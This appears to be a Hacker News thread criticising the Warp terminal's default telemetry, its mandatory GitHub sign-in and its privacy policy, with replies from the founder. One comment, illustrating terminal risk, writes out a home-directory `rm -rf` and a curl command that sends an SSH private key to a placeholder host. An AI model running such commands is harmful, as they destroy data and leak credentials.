I would pay for a foss paperless ngx fork with support for running in a readonly filesystem of arbitrary file structure, and giving me full text search with ocr for images, pdfs, and ideally descriptions of video files
Wanted to give it a shot but got disappointed when I launched it and the following happened:
- Outgoing request to googleapis.com
- Outgoing request to segment.io
- Outgoing request to sentry.io
- Requires sign up (only via Github, mind you)
I understand the first request is probably to get some dynamic configuration, even though I'd rather my terminal ship with static configuration. But then you have segment and sentry: not interested in sending telemetry from my terminal. Finally having user accounts for a terminal is such as strange concept.
I really wanted to like it, too. The screenshots look great
I expect my terminal to be a much more secure environment than my web browser. When an application starts communicating with the internet, I have no choice but to treat it with the same level of scrutiny as my browser.
Even making telemetry opt-in means that it has the capability to send information to the internet that I don’t know about, which means that I have to treat it like an application that can do that.
Honestly, this freaks me out. It’s an angle I’ve never considered before. Now I need to make sure my current terminal emulator (kitty) isn’t sending information to the internet without my permission.
Agree, this is a pretty bad deal breaker for me. Big business people doing short-sighted big business things, salivating at cramming a product full of telemetry. All without transparency around it? In a terminal of all things?? Indescribably off-putting and catastrophically damages my trust in the product and the CEO.
EDIT: To be fair there is some transparency in the original post. I was looking through the landing page for it (where it is not mentioned). Also, imho it should still be opt-in even for beta. Not everyone is going to read the wall of text to parse out the buried note on telemetry
This is why I deleted Fig (https://fig.io/) right after installing it. It must've sent some uninstall information, too, because the creator/CEO emailed asking why I uninstalled it afterwards...
Oh yea, Fig is also the one that is Mac only but never mentions that fact anywhere on their website. Everything is written to just presume that the reader is on a Mac.
Their getting started instructions [0] are all just terminal commands too, and even that doesn't mention Mac once.
> Oh yea, Fig is also the one that is Mac only but never mentions that fact anywhere on their website. Everything is written to just presume that the reader is on a Mac.
Not that it is not annoying, it is, but that's pretty common with Mac-only software in my experience.
Every single tool in the console homebrew space, I swear. And it's not like the code isn't portable, it's usually just some command-line / batch thing; but they just don't bother to compile it for anything other than Windows; and then they don't release it as OSS for you to do so, either. The number of things I've had to run under WINE...
Re: big business, we're still pretty small, but it's true that we are trying to build a business around the command-line. I get that's controversial and it's not something that exists and that the terminal is a super-sensitive low level tool.
We will never ever build a business around terminal data, and to be super explicit, we are 100% not collecting any command inputs or outputs.
The business that we want to build is around making a terminal (or a platform for text based apps) that grows because it makes individuals and teams a lot more productive on the command line.
I've there's one thing I've taken away from this ShowHN so far is that there is a lot of well-founded concern about the terminal and user data and that we need to do a better job on this issue.
Hey Zach, while I think your post is well-intentioned, the contemporary default level of trust around tech companies and data privacy is just very low. As a new entrant to the field, you inherit the default valuation—people have no other info to go off of.
Given that, it's probably the case that the only options are to either be fully open source or to make a fully offline mode an option.
In any case, I think the concept for your product is excellent—it's been mind-boggling to me that something along these lines wasn't tackled years ago, so I look forward to your guys' future success, hopefully moving the state of terminal interaction into the modern era.
> ...the contemporary default level of trust around tech companies and data privacy is just very low...
It's not just that the level of trust is very low. I shouldn't need to place any trust in the developers of my terminal at all. If I can't know for a fact that it's not acting against my interests, then I'll pass. I already have such a big selection of fully open-source terminals available. Why would I even consider taking any king of risk with this one?
I can’t speak for you, but generally people at least consider this tradeoff because of the additional utility of the third party tool. Ideally all these features would exist in the system terminal, but that hasn’t happened, and it possibly won’t ever.
As much as I can appreciate the community’s reaction to your approach of default
collection of telemetry, I can also equally appreciate you and the rest of the team sucking it up and accepting the feedback. Thanks for that, and I’m personally interested to see where you’re able to take Warp. I think there’s something potentially pretty compelling here.
My advice here would be to simply make telemetry opt-in during the beta period. I’m typically pretty liberal about opting in to telemetry (particularly when the extent of which is documented), but obviously a lot of your users will not be. Your desire to accelerate your progress seems to conflate with the needs of your target demo, and I think this warrants adjustment.
If the code is there, it is potentially exploitable. So, opt out is nowhere near good enough. If it can send to remote hosts, this can be abused. This capability should not be there, at all.
I am not conflating the two. If the terminal can run programs connected to the internet, then the terminal has internet connectivity. The host system would not be able to tell the difference.
Warp could certainly promise not to include any phone-home functionality in their code, but unless it's open-source and everything is audited, it could easily call the host system's HTTP client and still phone home.
> If the terminal can run programs connected to the internet, then the terminal has internet connectivity.
Is this true? This sounds wrong to me but I don't know the inner workings of terminals. The terminal just executes programs and handles pipes it seems. A terminal can be completely walled from the internet, and when you execute something from it, say, curl, then curl has it's own memory space and access layer outside the terminal, and just has it's stdio wired to the terminal.
> The terminal just executes programs and handles pipes it seems. A terminal can be completely walled from the internet, and when you execute something from it, say, curl, then curl has it's own memory space and access layer outside the terminal, and just has it's stdio wired to the terminal.
As I said in my comment, even if you "wall" the terminal off from the internet, if it can make system calls on behalf of the user, it can still access the internet.
If a terminal has sufficient access to the host system to call `curl https://www.google.com` on behalf of the user, then it can call it without any user input.
There is nothing on the host machine that can authenticate system calls coming from the terminal application as "user-initiated" or not. This is similar to the warning that "you can't trust the client"[1].
You're technically correct here due to some sloppy words, but this isn't the point that everyone here is trying to make. We know our terminals can connect to the internet, we don't want them to do that without being instructed to. If our terminals randomly curl'd websites (as opposed to delivering telemetry to a 3rd party), I'm sure the discussion would be similarly displeased.
And what I'm saying is that there's no way to set a terminal's permissions on the host system such that it can access the internet on behalf of the user but cannot access the internet on behalf of its creators.
This is a human problem, not a software one. Your terminal is as trustworthy as its creators. It cannot be locked down to prevent telemetry and still be a useful terminal. That was my original point and it is still true.
No one should use a for-profit terminal emulator, especially one created by a VC-backed startup, full stop.
they actually listen to our feedback, remove forced telemetry, remove sign-in in the next release, then i'd be more happy to give their product another chance
although no guarantee they'll not turn evil at some point in the future...
Profit motive means that even if they do that now, they're incentivized to collect data in the future. From the standpoint of investors, leaving that revenue stream on the table would be dumb, considering every other company in tech spaces draws revenue from collecting their customers' data.
If a company is committed to never spying, then they'd have no problem making such terms contractually binding on their end. Companies that say they're against spying, but leave the option to collect their users' data open for the future, aren't really committed to not spying.
Wanting to collect usage information and errors isn't evil-by-default. It's incomparably useful for troubleshooting and improving. Absolutely nothing works better, it's the best by a ridiculously large margin.
But yeah, terminals are very sensitive environments, opt-in should be a default even at launch.
> Absolutely nothing works better, it's the best by a ridiculously large margin.
Is this really the case? It seems that to find mistakes in software for various interaction patterns, truly exhaustive automated tests would likely work far better by various measures (coverage, reliability, reproducibility, reusability etc.) and at the same time do not have the extreme downside of privacy invasion. For example, see a section from the Age of Empires Post Mortem https://www.gamedeveloper.com/pc/the-game-developer-archives... :
"8. We didn’t take enough advantage of automated testing. In the final weeks of development, we set up the game to automatically play up to eight computers against each other. Additionally, a second computer containing the development platform and debugger could monitor each computer that took part. These games, while randomly generated, were logged so that if anything happened, we could reproduce the exact game over and over until we isolated the problem. The games themselves were allowed to run at an accelerated speed and were left running overnight. This was a great success and helped us in isolating very hard to reproduce problems. Our failure was in not doing this earlier in development; it could have saved us a great deal of time and effort. All of our future production plans now include automated testing from Day One."
No data on this but instinctively it seems, given alternatives, most people abandon some buggy software rather than patiently reporting problems and waiting for it to get better.
Yeah. User reporting has a very obvious and very strong survivorship bias. Plus the people who take the time to send in a report are a rather small niche, so you have pretty strong bias even if you exclude people who leave.
Always-on metrics are massively higher quality data. They don't collect the same kind of data in many cases, but they can reveal a lot of things that never get reported. They also don't suffer from the well-established pattern of people not accurately reporting their own behavior when asked / polled (stronger when asking about future behavior, but it applies in all cases).
In production, agreed. In beta, I’ll accept it. I feel that the term beta gets abused a lot, but in what I believe is it’s proper meaning, there are a lot of inherent factors both parties are agreeing to; increased risk of error and data loss, and debugging flags that generate more data for the singular purpose of improving the product. That’s exactly what should be in the privacy policy and explicitly stated upon install. Anything short of that puts me firmly in the hell-no category with you.
With you here on this. Telemetry is a really important concern and I get why people don't like it, but fundamentally the expectations on a beta product surely have to be different in that. The thing is still in development.
T
I'm with you on not sending data, but have you ever read user reports? IF you get any (most won't report) they likely won't have enough information to reproduce or fix.
It is evil by default. Paying beta testers, or giving them a free, opt-in version with telemetry is the ethical route. Being ridiculously, over the top clear about exactly what you snarf off the end user is the ethical route.
You are not entitled to access my machine, and that shouldn't be casually dismissed with "don't worry, we're not doing anything bad." You're creating potential vulnerabilities, and by implementing identifiable patterns, reducing the security of your users.
You shouldn't spy on people, and when you do, it's wrong. Remotely inspecting people's behavior is spying.
Your software doesn't need to phone home. It doesn't need automatic updates. You don't need to spy on people to develop good software. That's toxic nonsense.
Telemetry is just the cheapest and most convenient option for business owners, and not necessarily the best option when it comes to improving customer value and experiences.
Case studies, focus groups, surveys and interviews are great ways to determine usage patterns and problems with products and services. Of course, you'd need to pay users to participate in them, and then you need to pay expensive employees to conduct, collect and analyze the results. Spying is cheaper than doing any of that.
I agree both that telemetry is useful and that there's not necessarily a place for it in the tool I use to manage my workstation and hundreds of servers. Perhaps I'd opt in to a middle ground, that is collect telemetry locally into a support file I can review, evaluate, and potentially redact before submission.
> Absolutely nothing works better, it's the best by a ridiculously large margin.
Then why is the telemetry-encrusted modern Windows a usability fail, even compared to past versions of Windows which relied on extensive in-house user testing?
Usually the practice in these scenarios is to try out all possible ways to make out money and then go a little backwards once the public outcry is big enough. At some point you find the most profitable balance situation, before you have expelled all customers.
There is a plethora of free GPU-accelerated terminals. Alacritty, kitty, foot, wezterm, etc. None of these as far as I know send telemetry data. I see no reason to think that a new terminal is going to make money somehow by finding a balance.
My comparison was about business models of these "evil" cases in general, not about terminals particularly. On general, free apps tends to need find a balance how much users can tolerate their "exploitation" and how much they get from the app, if the app maker wants to make some money.
I don't personally see any reason to swap terminal with telemetry. One of my worst fears that some day I am forced to.
the problem with telemetry data is that sometimes you can accidentally collect sensitive data without realising it. i know one library on iOS was collecting the coordinates of all touch events. however, that meant it was collecting the coordinates of all touches on the keyboard which made it possible to reconstruct user input into password fields.
As the author of the post (and founder of the company), I think this is also a very reasonable concern. It's one that we have as well and that we take very seriously.
However, I do believe pretty deeply that every app has the potential to be much more powerful if it leverages the internet and I think the terminal is not an exception. I stand by that but get that it's a paradigm shift.
Please keep the feedback coming though - it's helpful to understand how you think about it.
> However, I do believe pretty deeply that every app has the potential to be much more powerful if it leverages the internet and I think the terminal is not an exception.
But that’s exactly it. A lot of people on here, including me, do not agree that _every_ app has that potential. In fact many believe that internet connected apps are unnecessary for many things. There is strong evidence against this if you just look at the number of “secure” systems that have been hacked over the decades. While you may capture a large audience with your internet-first terminal “app”, who honestly don’t care about this stuff while at work, you will get pushback from HN and somewhat+ privacy concerned devs.
As a user, I can see the potential, sure. But it's not realized in any way. Right now this terminal uses Internet only for collecting my data (GitHub account, telemetry, and more).
The value proposition is negative. A paradigm shift, sure, but IMO in wrong direction.
> I expect my terminal to be a much more secure environment than my web browser.
Wat? Your terminal is 1000x less secure than your browser. Your terminal can do `rm -rf ~/`. your terminal can run `curl -F 'data=@~/.ssh/id.rsa' https://bad.com` and that just 2 of 1000s.
JS on your browser can do none of those.
Maybe you meant to say you want apps running from the terminal to not phone home but nothing in the terminal prevents that.
That's security vs. safety. You're pointing out that a terminal allows the user to do perform actions that could be unsafe. These actions or JS in the browser are a security risk because they can perform actions without the user's awareness or consent.
nonsense. The terminal is a place that you run software. Every piece of software you run in the terminal can do all kinds of nasty things to your system and steal info
the browser is also a place to run software. There, that software can not do anything to your system nor can it steal any data
I'm not sure I'm ready to have SaaS models replace core utilities and tools locally.
> Announcing Warp’s Series A: $17M to build a better terminal
And just thinking about this... it's not clear to me what their moat will be as I suspect if there's a really compelling feature it will be available in OSS terminals quite quickly. Perhaps it's the product polish? But I'm not sure polish is what I want from a terminal, at least... it's not the top thing I want .
I wondered the same. Then I realized it sends out requests to googleapis, segment, and sentry. Imagine having data on every dev's terminal workflow? Ca$h.
A lot of workplaces don't even bother to ban grammarly, which is literally a keylogger*, this won't even be on their radar.
* I feel compelled to point out that Grammarly disagree with this definition because it doesn't send every single keystroke, just the ones in non-password text boxes.
If my plugin Passwordly, only sends the keystrokes inside password boxes, is or isn't that a key logger? It's only capturing a subset of your input, like Grammarly, so not a keylogger?
If the argument is, it's not a keylogger because it's not logging sensitive information, well I type plenty of sensitive information into non-password textboxes.
I’d say passwordly also isn’t a key logger. By your definition every text editor would be a key logger. That may be the strict definition of a key logger but the commonly accepted meaning is different. A keylogger logs all keys regardless of the app being used or general use case. Often they are malicious as well but that doesn’t have to be the case.
I doubt their compelling features will be in OSS terminals any time soon. I’ve wanted a terminal that has a decent multi line editor for years, and there’s nothing out there.
Vim supports multiline editing and I'd imagine emacs does as well.
In bash/zsh, <ctrl-x ctrl-e> opens up $EDITOR so you can use whatever you're accustomed to anyhow.
Most of these features are already available if one spends a bit of time configuring their terminal/shell.
I use the visual-multi plugin [0] all day in vim/neovim.
I don't like using tons of plugins but multi cursor with with selective invocation like the ctrl-d of sublime etc was the main thing I missed when moving to vim. (I use visual block mode too but it's not the same thing).
They are very useful! As a long time Vim user who switched to Kakoune[0] a while back, I didn't even realize I needed a good multiline cursor from my editor before it tried Kakoune. Highly recommend it!
If you need to pass lots of arguments to a command it's super useful. Typically I don't do this because it's quite unwieldly with a standard readline editor, but I could if multiline editing was available!
While this can be done in zsh/bash, it takes investment to understand how to use multiline specifically. And then once you leave the terminal, the same keystroke does not do anything for you.
One of Warp is that you don't have to think twice about it because it behaves similarly to text fields everywhere else on your computer.
In the terminal, I often have the feeling that personal computing revolution from Xerox PARC & Apple Computer never happened.
This works in everything that uses libreadline to accept user input (unless the binary has specifically configured library differently iiuc), so should work in all shell-like interfaces. You can customize the shortcuts in inputrc, likewise, for all libreadline-using binaries. By default, readline tries to be emacs-like. You can ask it to be vi-like, or reconfigure lots of its shortcuts to be similar to an editor you like. To be fair, "escape to real editor" is not a thing you usually do in an editor, so that will remain special.
This stuff has been in the major shells for years, through excellent editor integration. For emacs and vi it's pretty much free. If you want to integrate with a different editor, it's totally doable.
Most of the stuff sibling comment is referring to center around the feature:
'edit-and-execute-command' in bash. There is a similar incantation for zsh.
If I open an editor then my scrollback history isn't visible (or is in a separate window). Maybe vim and emacs offer this, but that's a big commitment just for a terminal. Warp has GUI-grade editing (mouse support, etc) with things like multiple cursors in a very nice interface.
In emacs a shell is like a text buffer where you can simply search or move around as you would do in a text file. To get command history you'd just execute `history` and then ctrl+s (find) it, or move to it with the cursor.
Normally I would pull the command I need multi-line editing for back from shell history, using the search operator '!' and print predicate ':p' before invoking bash's 'edit-and-execute-command' on it. I suppose while in the editor then I might need history again, but I can't recall it being an issue.
I love how my previous comment is downvoted with no answer by I assume bash and zsh fanboys when these kinds of features are barely used by users, because they can't be easily found.
Use something like fish to see what real feature discoverability for a shell looks like.
And I say this as a zsh user that has waded through the mountains of obscure documentation to set it up. Don't fall into Stockholm syndrome and think that if you went through hardship, others should, too.
99% of bash/zsh discussion threads are someone going: "here is awesome feature I found" (where frequently that feature is something that should have been painfully obvious to notice) and then 100 replies: "that's so cool and useful, I never knew about it and I've been using bash/zsh for N > 5 years".
I have no idea who downvoted you or why they did so. I'm seeing your reply for the first time. From what I can see, our priorities in our tools are different. Discoverability and widespread use of particular features are not near the top of my list. I have read the bash manual. For the tools I use most, I've found it to be a good investment, that has paid me great dividends.
Doesn't `set -o vi` do this for you? Place it in .bashrc and you're good to go.
It's great to use this with awesomewm for windows management, and vimium for browser control.
Then you can develop in vim, bash in vim, browse in vim, and switch windows with vim. You don't have to learn 10 different, unintuitive, and ridiculous hotkeys for each different program or level.
FWIW, the Warp terminal will be free for individuals. We would never charge for anything a terminal currently does. So no paywalls around SSH or anything like that. The types of features we could eventually charge for are team features.
Our bet is that the moat is going to be the team features, like:
- Sharing hard-to-remember workflows
- Wikis and READMEs that run directly in the terminal
- Session sharing for joint debugging
Our bet is their companies are willing to pay for these. BTW, even these team features will likely be free up to some level of usage and only charged in a company context.
> The types of features we could eventually charge for are team features.
You can probably maximize community acceptance if you provide clients that do not use these features as actual FOSS and only start incorporating closed-source pieces for those features. With things like client keys etc to restrict server access.
A bit like the Chrome/Chromium thing was intended initially.
Those get codified into ansible and deployed on CI/CD pipelines. This is an anti-feature. The day that someone suggests using a terminal to manage hard-to-remember workflows is the day I start a huge crusade to fix whatever process led to introducing yet another tool.
> - Sharing hard-to-remember workflows
= Make better scripts and put in CI
> - Wikis and READMEs that run directly in the terminal
No thank you
> - Session sharing for joint debugging
= That's more for development.. not for shell access
> Our bet is their companies are willing to pay for these. BTW, even these team features will likely be free up to some level of usage and only charged in a company context.
I actually don't want them. I migrated from many apps that do too much to apps that do one thing really well.
(Not affiliated with Warp but care about this particular thing)
Shell scripts implies, well, a particular shell. If everyone is on similar OSes, maybe that works for you, but as a Windows user, "pile of bash scripts" might as well be "doesn't work for you." I use a terminal for my daily work, but don't have bash installed on my machine.
That said, I haven't tried Warp yet specifically because it's Mac-only right now. Even within that context, Warp integrates with Bash, Zsh, or Fish, which do have their own extensions to POSIX shell, but at least you can rely on Bash being installed.
That would also now force everyone to use this proprietary product instead of whatever they're familiar with.
For mac <-> linux, posix-compliant scripts mostly work in my experience but you have to account for different versions of gnu utils. For linux <-> windows, if it's small you could just write a powershell script, or use something like python on both, no?
I fail to see how these features are nice enough to force people to use a proprietary terminal that, for now, is compatible with existing bash/zsh shells.
Yes, that is true, but it does seem like that's what their strategy is. If you're using these collaboration tools at your job, you'd have to be using the product already. So that's less of a problem than it would be for say, scripts included with some sort of open source project.
My point is mostly that shell isn't cross-platform, and this is one way you could address that. But it's not a generalized solution, absolutely.
(and yeah, something like Python is better than trying to keep multiple of the same scripts in different languages, for sure. You can do it if you wanted though, if they're small and you're willing to commit to it, I'm not sure I've ever seen it really pulled off.)
basically every operating system has a posix shell by default except windows, but it has been ported there multiple times, samba existed for decades and WSL is on the rise. It may sound a little more irritating but they deserve it for still running windows :p /hj
(besides you can just host an ssh server)
I mean, I could also tell you "Just download and run PowerShell, it's ported to Linux", but you also know that would make you feel like a second-class citizen, because you know it's not something as good as something that actually works on your platform in a real sense.
Why would it be easier to port Warp to a new system compared to Bash, Python, Perl, etc.? These tools are widely used to automate workflows and are already ported to any system you would probably care to develop on.
So programs/workflows written in Warp will be portable without much effort, in some way that an equivalent shell or python script isn't? Why do you think that?
Ok, maybe I misunderstand what a "workflow" is. Since we are talking about replacing shell scripts with "workflows", I assumed that they are a kind of programming facility of about similar power as shell scripts. But that may be incorrect.
> You aren't the one porting Warp, but you are the one porting the shell script.
It sounds like your are saying somthing like "Warp scripts/workflows require almost no effort to port, compared to the shell scripts they replace". I was interested to learn how this can be the case. Perhaps my interpretation was wrong.
I may also be too; like I said, I haven't used Warp yet. Just read their docs. "Workflows" are described in their docs as effectively 'aliases with better docs that integrate with a search bar', and are defined in a YAML file. They don't actually show said YAML file, so I don't know how complex they are. If they give you the full power of the underlying shell, then yeah, you're back at the exact same problem, but if it's stuff like "invoke this program with this set of arguments," which is what their examples seem like, then I'd expect it to work with any shell as long as that program is installed.
> Perhaps my interpretation was wrong.
And perhaps mine is. The docs aren't in-depth and I don't own a Mac. But really, ultimately, "are workflows more portable" isn't a question I personally am wed to; it's that "shell scripts are only portable via UNIXes and there's a much bigger world out there" that I am, and I am hoping that workflows are more portable than shell scripts. In practice, they may be, or they may not be, but since they're in a layer above the shell, it's possible that they're not shell-specific.
That's a great question! Version controlled shell scripts are very useful (and in fact workflows in Warp can also be version controlled) but they still have a few problems:
1) Documentation--when a repo has a lot of shell scripts, it can be very difficult to know which command to run in certain situations. Even if each shell script has documentation, there's no way to find that documentation natively from the terminal itself.
2) Searching--you can only execute commands from the terminal based on the shell script name but there's no easy way to search for a script based on _what_ it does or any other metadata.
It's just.. an incredibly bad look to have this be the top comment on a post about this while the website claims that "cloud stuff" is opt-in.
It's more essential to be honest about this during the beta period than after, so "oh it will be opt in" is a cold comfort, alongside the approximately never-true "we'll open source it some day."
Not touching this with a ten foot pole. Not for something as essential to my day to day work as a terminal.
Further down in the thread, they claim that Warp is nearly as fast as Alacritty. Then a user points out that it isn't even close and their response is basically, yeah, we know that. We want to fix it.
How does a company expect lying on HN to work out well for them? I'm sure they're doing their best, and are excited about their launch. But they are coming off as so shady because they're trying to fool people.
If they really wanted to be open source but don't accept contributions at the time, setting up a read only minor with a proper FOSS license will be a good way to do that.
Opt-in refers to anything that sends any contents of a terminal session to our servers (as opposed to telemetry which is metadata and never contains any terminal input or output). But we hear the feedback and appreciate it.
"Private & Secure:
All cloud features are opt-in. Data is encrypted at rest."
While you might have some wiggle room to say that telemetry is not a "cloud feature", logging in with github is absolutely a cloud thing and it's not really opt-in if you can't use the software without literally identifying yourself to a cloud service.
You should at the very least remove that text from your front page until you're out of beta and it's actually true.
And that's ignoring the fact that there's no victory in splitting hairs over the definition of cloud stuff to pretend you're not walking a very fine line.
Zach, this telemetry approach is fine for Google Docs retail users but Warp's target customers are some of the tech savviest people on the planet. They are going to hold Warp to much higher standards of security and privacy.
Second, your user onboarding has too much friction with mandatory Github logins. You need an advisor / product manager who can guide you better when making these "human" decisions.
Because you posted directly to HN and clearly want to show this audience the value of your work, I expected a somewhat different reply to this critique.
A more user-centered reply might have been to say you understand the confusion and will look into making this truly opt-in with the team. I think the strong message you're getting from this community—who is, after all, your target audience—is that before sending any data (whether you choose to label it telemetry, tracking, diagnostic data, or otherwise), you should explicitly ask in the terminal itself whether the user finds this acceptable.
I don't want to put down an effort with seemingly good intentions like this one, so please take this engagement in the spirit it was given.
I was confused by your wording, but I think this section of the link is very relevant:
>When Warp comes out of beta, telemetry will be opt-in and anonymous.
>But for our beta phase, we do send telemetry by default and we do associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong.
I highly doubt anyone reads that. I think the only way to be up-front about it is to have an annoying pop-up that with a button that says "OK YOU CAN SEND TELEMETRY" that must be clicked before proceeding.
To be fair, I think HN is a collection of outliers when it comes to caring about network activity caused by running programs. Most devs will probably just be happy that the tool provides a lot of value.
If you really wanted to be open source but don't accept contributions at the time, setting up a read only minor with a proper FOSS license will be a good way to do that.
No way this is GDPR compliant. A mandatory Github login sends data to US servers. Even with the normal additional standard contract clauses it is at least disputed, if this holds any grounds in a CJEU trial.
Twilio, the owner of Segment.io is also a US company and will receive individual-related telemetry data, which should break with GDPR.
As the author of the post, I think this is totally reasonable feedback and something we have discussed quite a bit on the team.
The general stance on telemetry that we have is that
a) we are just starting and it's really helpful to see which of our product ideas are useful to our users (e.g. does anyone use AI Command Search? Should we continue to invest in it)
b) we tried to be very explicit about what we are and are not sending - it is only metadata and never command input or output (you can see the full list of events we track here: https://docs.warp.dev/getting-started/privacy#exhaustive-tel...
c) if you aren't comfortable with telemetry, then please don't use the product just yet - we will make telemetry opt-in when we have a large enough sample size that we can be confident extrapolating what's going on
For googleapis - this is for login. We use firebase as our auth provider.
For segment - this is for temeletry, as you point out.
For sentry - this is for crash reporting.
As for why we have accounts, it's because we are starting to add features for teams and it's important in that context that there is some type of identity associated with the user.
But like I said at the start - the feedback is totally reasonable and we are trying to figure out how to balance concerns here while still being in a good place to iterate on and improve the product.
As a Sentry user (for a web app where people are not placing sensitive IP!) - it is INCREDIBLY easy for it to be configured to suck up massive amounts of PII and sensitive IP in the context of its crash reports. If I am running `kubectl create secret --from-literal` and something crashes, can you guarantee that the contents of that command will not be loaded into Sentry? Breaching this guarantee would be as simple as having some code somewhere in your stack (including a parsing library) format an Error with the command contents, miles away from anything Sentry-specific.
I'd be much more trustful of your product (and indeed, I do desperately need a better terminal!) if you were to:
- make Sentry crash reporting opt-in (or at the very least have a popup that occurs with the content of what will be sent to Sentry before anything is sent to Sentry), AND
- clarify in your event telemetry documentation, and explicitly in your Privacy Policy, that ONLY the event ID/name, timing, and the user ID are sent to Segment, nothing else.
But I simply cannot use a terminal where my keystrokes might be logged to anyone's Sentry or Segment account - even if it were our company's own Sentry account. The risk of partner-entrusted credential leakage into an insecure environment is simply too high.
> - make Sentry crash reporting opt-in (or at the very least have a popup that occurs with the content of what will be sent to Sentry before anything is sent to Sentry), AND
100% this. I don't entirely understand why Warp needs to connect to Sentry right at application launch. If it crashes, capture that crash and present me an opportunity to report it or not. If I do agree to report it, first present me the complete text of everything that will be reported.
I understand that this puts some hurdles in the way of getting crash reports. But terminals frequently contain information far too sensitive to trust with these things being automated.
You can use the Firebase login tools without the person identification stuff pulled in. Note that for companies failing to do this in a privacy respecting way, a savvy user can usually get granular at the firewall and get the login to work without the audience reporting. Which means you could…
Similarly, in my book, segment.io isn’t just “telemetry” so much as it’s killer feature of cross app audience persona correlation, so less about what’s up with the app, more trying to learn more about the users without asking them. If you were instrumenting the app UX and not trying to see who is using you, there are other choices.
A number of ways to do accounts that can leverage a person’s own IdP or other approaches where you don’t have to have accounts, e.g. most any channel the team or group can access will do to get in sync on a session start.
Regardless, and even if GitHub and e.g GitHub Orgs are your way, all of them should be optional since not everyone is desperate to team their cli.
Last, and sorry to put it like this, if you’ve “discussed it quite a bit” as a team, I’m not sure but maybe that gives me less confidence in your respect for security, privacy, and users.
I’d imagine that deliberate discussion backed by respect for your users and team know-how should have resulted in a different set of choices.
> Warp is a blazingly fast, rust-based terminal reimagined from the ground up to work like a modern app.
Well, at least they didn't lie.
As of my personal position: I want less products in my computing environments, not more. I hope more people would ponder on possible ramifications of going in the opposite direction.
I'm not sure I care very much about which piece of software is a "product" or not (I have no qualms with devs asking for money), but I definitely agree that calling a piece of software "modern" actually carries negative connotations nowadays. I think most would agree that apps developed within the last 4 years are often more resource-intensive and slower than the equivalents from 15+ years ago.
Warp looks really cool as a tool and I intend to try it as soon as it's available on Linux, but it was pretty bold of them to include outgoing network requests by default before presenting directly to HN. I saw the post about "everything is opt in, where 'everything' means 'sending terminal contents'" - as if people read privacy policies before trying out a new dev tool.
We exists, but it's complicated. A complete solution has more edge cases than what "stacks" have tools to work with. My gut feeling is that the contemporary approach to solving information problems is crazy nonsense. I'm working on something to prove myself wrong. If I'm not I'll make something available for a fee
Yeah. From a developer standpoint my terminal is the one sacred thing i have still. Im unfortunately not using something that is going to randomly break or make external calls every time I open it.
I nearly also used the word “sacred” in my comment above.
I gave up MacOS for Linux because I felt like Apple wasn’t letting me operate my own computer anymore. Even Ubuntu has eroded the transparency and control I have over my computer over the last decade, at least that’s my perception.
I feel like the only part of my computer that I understand anymore is what happens in the terminal.
I don’t categorically hate having magic happen on some remote server that makes computing easier for me in some way… but I really need to have a space that I understand and control and — over time — that place has slowly been compressed into the command line.
> Wanted to give it a shot but got disappointed when I launched it and the following happened
Yup, well, that's what happens when you take money from VCs or other third party investors, you need to monetise / demonstrate ROI / need numbers for your investor slide-decks.
I'll stick to my old-fashioned spyware free terminal thanks very much. Why overcomplicate things that don't need to be complicated.
Yep. In my last project one of the key USPs was privacy. The product vision was built around it and it was fundamental to our positioning in the market.
But I made the mistake of letting investors share executive control of the company, and pop there goes the pro-privacy policy.
In defence of founders everywhere, however, I will say that the investors didn’t just say “no”. They strung me along for almost a year, insisting we would be meeting about it, recording decisions where we apparently agreed, even pointing out those decisions while they flagrantly violated them in practice.
So who knows what’s happened here. A lot of the messaging sounds like what happened to me. “Yes we know privacy is important and in the future mumble mumble.”
Yea, I would never use a terminal that does any of that. If you want logging and crash reports, use Breakpad or something similar to send the crash report after a crash. No need to have telemetry reports going all the time.
In addition to crashes, we also want to know things like: which features people are using so we can invest more in them, how much people are using the app so we know if we're doing in a good job.
Totally understand if you're not comfortable with that though! It will be removed when Warp is out of the beta test.
I know it sounds logical to you, but the further down that road you go the worse your software will be in the end. Make software with a coherent vision and you can pick and choose features based on how will they fit that vision without needing to spy on your users, or turn it into a popularity contest.
Incidentally, you might be interested to know that in the last 8 hours my comment has gotten 25 upvotes; that’s a lot of lost customers.
I don’t mean that my comment cost them customers, only that the upvotes on my comment measures the customers they had already lost by using pervasive telemetry.
It just results in loosing infrequently used but important features. First it gets moved from a button to a menu, then to a sub-menu and eventually removed.
Exactly. I prefer Emacs–style programs where the number of features grows without end, and everyone customizes the UI and keybindings to make the features they like best easiest to use. Every time someone thinks of a new way that Emacs can make their life easier they can add it to Emacs immediately, without asking for permission or even sending in a pull request. Later, if they think the feature is polished enough and others might find it useful, they can send a pull request either to Emacs or to the Emacs Lisp Package Archive (ELPA), or to MELPA (should they not like the minor licensing restrictions on ELPA), or just post it on EmacsWiki or their blog or Facebook page or whatever for others to copy from.
But for that to work you have to start with something that is both very extensible, and yet is also coherently designed. The extensibility has to be a strong part of that initial design, so that the software is designed to be malleable.
That privacy policy is sketchy. It starts with this-
> Our general philosophy is complete transparency and control of any data leaving your machine. This means that in general any data sharing is opt-in and under the control of the user, and you should be able to remove or export that data from our servers at any time.
They then go on, further down the page, to say that this first paragraph is a complete lie-
> However, for our beta phase, we do send telemetry by default and we do associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong.
It’s a policy - a set of rules. It’s only a problem if you say something and don’t do it. But even then, enforcement is most likely to come from interested parties like payment providers, who couldn’t generally care less as long as it’s not their data that’s compromised.
I remember an iOS email client many years ago that required a Dropbox login for some reason. It made no sense that an email client would require me to log in to a cloud file storage/syncing service - in my mind these two things are completely unrelated. That email client ended up disappearing.
I expect that a terminal program which requires a login to a completely unrelated service will end up meeting the same fate as that email client did.
> I really wanted to like it, too. The screenshots look great
Agreed! Let's just wait for a FOSS alternative to pop up that has a few similar fundamental features. Don't need the cloud-multi-user-account-based stuff.
Among other things, it is disturbing how chatty a lot of things are. (Did you know Apple Mail keeps track of which account you email different people with and wants to send that to configuration.apple.com, even if you have carefully disabled everything Icloud related?)
There's a similar tool for Linux, but I usually keep a networkless VM around for playing with potentially sketchy things.
There is a section about being required by the EU to determine location for VAT collection purposes. If their payment processor can’t determine your location sufficiently, then they have to collect data identifying your location and store it for tax/proof purposes. That’s something they don’t want to ever have to do, obviously.
Yep, I can pay money for a piece of software so important for my workflow, but no telemetry, no login and other stupid stuff even in opt-in/opt-out fashion.
Exactly the same, clicked "comments" as I was downloading it, saw the first comment, deleted the installer.
